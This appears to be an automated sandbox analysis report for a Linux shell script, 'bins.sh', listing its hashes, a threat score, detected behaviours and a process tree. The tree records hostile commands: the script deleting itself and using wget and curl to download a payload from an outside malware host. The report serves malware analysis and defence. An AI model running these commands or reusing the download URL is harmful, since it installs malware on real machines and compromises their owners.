Analysis

  • max time kernel
    150s
  • max time network
    12s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    10/12/2024, 11:00

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    2cb62c12f7b74b008f2d2fe409ccfe5d

  • SHA1

    06bdad09642ff840259f813a0fd9fc348a58b76d

  • SHA256

    9a1fe6336b9891af1c5f6e09f6de24ac6aaf11c273b36380e10a8b41ca8bc349

  • SHA512

    b11226d6f0d4244e5e88379ed0e86a4dcadfeae59d3d59be80eb52e4f503e4167a497c1f063993bc932876323aa05770dcb52fc561896b47c7e599297f145277

  • SSDEEP

    96:YDUdDUdDUAU7UHUQO+P99Eo1VELttJLr7rXroXB5jFDfipBrLFlqUyKSLBGB2BfA:PfhyU6t8ckH

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:650
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:656
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
          2⤵
          • System Network Configuration Discovery
          PID:657
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:664

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads